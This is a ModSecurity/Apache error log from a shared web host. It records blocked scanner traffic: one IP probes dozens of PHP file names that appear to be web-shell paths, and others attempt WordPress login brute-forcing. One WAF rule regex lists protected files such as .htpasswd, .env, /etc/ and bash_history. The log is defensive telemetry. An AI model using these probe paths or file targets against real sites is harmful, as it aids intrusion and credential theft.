[Tue May 26 19:14:57.602989 2026] [security2:error] [pid 26857:tid 27103] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/dx.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnFwAA-Sw"]
[Tue May 26 19:14:57.735675 2026] [security2:error] [pid 26857:tid 26900] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/11.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnHgAAvSo"]
[Tue May 26 19:14:57.735871 2026] [security2:error] [pid 26857:tid 27043] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/11.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnHgAAvSo"]
[Tue May 26 19:14:57.822478 2026] [security2:error] [pid 26857:tid 26903] [remote 216.73.216.30:48044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj2dfoqtHEG_e9i6GnIgAA8S0"]
[Tue May 26 19:14:57.841634 2026] [security2:error] [pid 26857:tid 26899] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/p.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnIwAApik"]
[Tue May 26 19:14:57.841838 2026] [security2:error] [pid 26857:tid 27020] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/p.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnIwAApik"]
[Tue May 26 19:14:57.931321 2026] [security2:error] [pid 26857:tid 26906] [remote 216.73.216.30:48044] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj2dfoqtHEG_e9i6GnJAAA8TA"]
[Tue May 26 19:14:57.957076 2026] [autoindex:error] [pid 26857:tid 26907] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:57.957920 2026] [security2:error] [pid 26857:tid 27005] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj2dfoqtHEG_e9i6GnJQAAlzE"]
[Tue May 26 19:14:58.653494 2026] [security2:error] [pid 26857:tid 26914] [remote 141.95.202.18:37252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWj2tfoqtHEG_e9i6GnQwAA7jg"]
[Tue May 26 19:14:58.901392 2026] [security2:error] [pid 26857:tid 26919] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/bthil.php"] [unique_id "ahWj2tfoqtHEG_e9i6GnWwAA1j0"]
[Tue May 26 19:14:58.901552 2026] [security2:error] [pid 26857:tid 27068] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/bthil.php"] [unique_id "ahWj2tfoqtHEG_e9i6GnWwAA1j0"]
[Tue May 26 19:14:59.013441 2026] [security2:error] [pid 26857:tid 26924] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/7.php"] [unique_id "ahWj29foqtHEG_e9i6GnXwAAokI"]
[Tue May 26 19:14:59.013642 2026] [security2:error] [pid 26857:tid 27016] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/7.php"] [unique_id "ahWj29foqtHEG_e9i6GnXwAAokI"]
[Tue May 26 19:14:59.160273 2026] [security2:error] [pid 26857:tid 26930] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/8.php"] [unique_id "ahWj29foqtHEG_e9i6GnbAAA9Eg"]
[Tue May 26 19:14:59.160514 2026] [security2:error] [pid 26857:tid 27098] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/8.php"] [unique_id "ahWj29foqtHEG_e9i6GnbAAA9Eg"]
[Tue May 26 19:14:59.515270 2026] [security2:error] [pid 26857:tid 26926] [remote 74.249.212.138:0] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "www.kingsclub.in"] [uri "/1.php"] [unique_id "ahWj29foqtHEG_e9i6GnegAAsEQ"]
[Tue May 26 19:14:59.515367 2026] [security2:error] [pid 26857:tid 26926] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/1.php"] [unique_id "ahWj29foqtHEG_e9i6GnegAAsEQ"]
[Tue May 26 19:14:59.515583 2026] [security2:error] [pid 26857:tid 27030] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/1.php"] [unique_id "ahWj29foqtHEG_e9i6GnegAAsEQ"]
[Tue May 26 19:15:00.230031 2026] [security2:error] [pid 26857:tid 27017] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj29foqtHEG_e9i6GnjQAAAKM"]
[Tue May 26 19:15:00.319753 2026] [security2:error] [pid 26857:tid 26939] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/100.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnpwAA31E"]
[Tue May 26 19:15:00.320048 2026] [security2:error] [pid 26857:tid 27077] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/100.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnpwAA31E"]
[Tue May 26 19:15:00.416106 2026] [security2:error] [pid 26857:tid 26937] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/about.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnrgAA9E8"]
[Tue May 26 19:15:00.416300 2026] [security2:error] [pid 26857:tid 27098] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/about.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnrgAA9E8"]
[Tue May 26 19:15:00.508106 2026] [security2:error] [pid 26857:tid 26947] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/admin.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnsgAArVk"]
[Tue May 26 19:15:00.508317 2026] [security2:error] [pid 26857:tid 27027] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/admin.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnsgAArVk"]
[Tue May 26 19:15:00.602567 2026] [security2:error] [pid 26857:tid 26950] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/edit.php"] [unique_id "ahWj3NfoqtHEG_e9i6GntwAAsVw"]
[Tue May 26 19:15:00.602783 2026] [security2:error] [pid 26857:tid 27031] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/edit.php"] [unique_id "ahWj3NfoqtHEG_e9i6GntwAAsVw"]
[Tue May 26 19:15:00.738235 2026] [security2:error] [pid 26857:tid 27102] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnqgAAAPg"]
[Tue May 26 19:15:00.751552 2026] [security2:error] [pid 26857:tid 26952] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-content/admin.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnvgAA3l4"]
[Tue May 26 19:15:00.751807 2026] [security2:error] [pid 26857:tid 27076] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-content/admin.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnvgAA3l4"]
[Tue May 26 19:15:00.861047 2026] [security2:error] [pid 26857:tid 26955] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/f6.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnxQAAmmE"]
[Tue May 26 19:15:00.861208 2026] [security2:error] [pid 26857:tid 27008] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/f6.php"] [unique_id "ahWj3NfoqtHEG_e9i6GnxQAAmmE"]
[Tue May 26 19:15:01.017873 2026] [security2:error] [pid 26857:tid 26958] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/inputs.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn1QAA4GQ"]
[Tue May 26 19:15:01.018057 2026] [security2:error] [pid 26857:tid 27078] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/inputs.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn1QAA4GQ"]
[Tue May 26 19:15:01.136077 2026] [security2:error] [pid 26857:tid 26964] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/av.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn3AAAxGo"]
[Tue May 26 19:15:01.136279 2026] [security2:error] [pid 26857:tid 27050] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/av.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn3AAAxGo"]
[Tue May 26 19:15:01.259136 2026] [security2:error] [pid 26857:tid 26967] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/classwithtostring.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn5AAA_W0"]
[Tue May 26 19:15:01.259441 2026] [security2:error] [pid 26857:tid 27107] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/classwithtostring.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn5AAA_W0"]
[Tue May 26 19:15:01.405262 2026] [security2:error] [pid 26857:tid 26966] [remote 199.247.4.24:39850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn4wAA22w"]
[Tue May 26 19:15:01.536120 2026] [security2:error] [pid 26857:tid 26968] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-content/themes/index.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn-AAA8W4"]
[Tue May 26 19:15:01.536368 2026] [security2:error] [pid 26857:tid 27095] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-content/themes/index.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn-AAA8W4"]
[Tue May 26 19:15:01.628820 2026] [security2:error] [pid 26857:tid 26973] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-blog.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn-gAAqXM"]
[Tue May 26 19:15:01.629018 2026] [security2:error] [pid 26857:tid 27023] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-blog.php"] [unique_id "ahWj3dfoqtHEG_e9i6Gn-gAAqXM"]
[Tue May 26 19:15:01.880118 2026] [security2:error] [pid 26857:tid 26971] [remote 216.73.216.30:48044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj3dfoqtHEG_e9i6GoCAAA3HE"]
[Tue May 26 19:15:02.140877 2026] [autoindex:error] [pid 26857:tid 26974] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:02.141850 2026] [security2:error] [pid 26857:tid 27103] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj3tfoqtHEG_e9i6GoGwAA-XQ"]
[Tue May 26 19:15:02.190786 2026] [security2:error] [pid 26857:tid 27091] [client 167.160.78.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWj3tfoqtHEG_e9i6GoHAAAAO0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:15:02.321956 2026] [security2:error] [pid 26857:tid 26976] [remote 92.205.188.156:51856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWj3tfoqtHEG_e9i6GoHQAArHY"]
[Tue May 26 19:15:02.884590 2026] [security2:error] [pid 26857:tid 26984] [remote 92.205.188.156:51856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWj3tfoqtHEG_e9i6GoUQAA4H4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:15:02.896924 2026] [security2:error] [pid 26857:tid 26871] [remote 216.73.216.30:48044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj3tfoqtHEG_e9i6GoVwAA3A0"]
[Tue May 26 19:15:02.918309 2026] [security2:error] [pid 26857:tid 26870] [remote 91.210.171.209:53924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWj3tfoqtHEG_e9i6GoUAAAjgw"]
[Tue May 26 19:15:03.090872 2026] [security2:error] [pid 26857:tid 26874] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-content/admin.php"] [unique_id "ahWj39foqtHEG_e9i6GoZQAArxA"]
[Tue May 26 19:15:03.091087 2026] [security2:error] [pid 26857:tid 27029] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-content/admin.php"] [unique_id "ahWj39foqtHEG_e9i6GoZQAArxA"]
[Tue May 26 19:15:03.375723 2026] [security2:error] [pid 26857:tid 26879] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/adminfuns.php"] [unique_id "ahWj39foqtHEG_e9i6GoeAAAsBU"]
[Tue May 26 19:15:03.375960 2026] [security2:error] [pid 26857:tid 27030] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/adminfuns.php"] [unique_id "ahWj39foqtHEG_e9i6GoeAAAsBU"]
[Tue May 26 19:15:03.461674 2026] [security2:error] [pid 26857:tid 26880] [remote 216.73.216.30:48044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj39foqtHEG_e9i6GofQAA3BY"]
[Tue May 26 19:15:03.467065 2026] [security2:error] [pid 26857:tid 27026] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj39foqtHEG_e9i6GoYQAAAKw"]
[Tue May 26 19:15:03.609418 2026] [security2:error] [pid 26857:tid 26885] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/goods.php"] [unique_id "ahWj39foqtHEG_e9i6GohgAA7Bs"]
[Tue May 26 19:15:03.609611 2026] [security2:error] [pid 26857:tid 27090] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/goods.php"] [unique_id "ahWj39foqtHEG_e9i6GohgAA7Bs"]
[Tue May 26 19:15:03.720124 2026] [security2:error] [pid 26857:tid 26882] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ms-edit.php"] [unique_id "ahWj39foqtHEG_e9i6GoigAAiRg"]
[Tue May 26 19:15:03.720283 2026] [security2:error] [pid 26857:tid 26991] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ms-edit.php"] [unique_id "ahWj39foqtHEG_e9i6GoigAAiRg"]
[Tue May 26 19:15:03.814033 2026] [security2:error] [pid 26857:tid 26884] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/222.php"] [unique_id "ahWj39foqtHEG_e9i6GojQAA7Ro"]
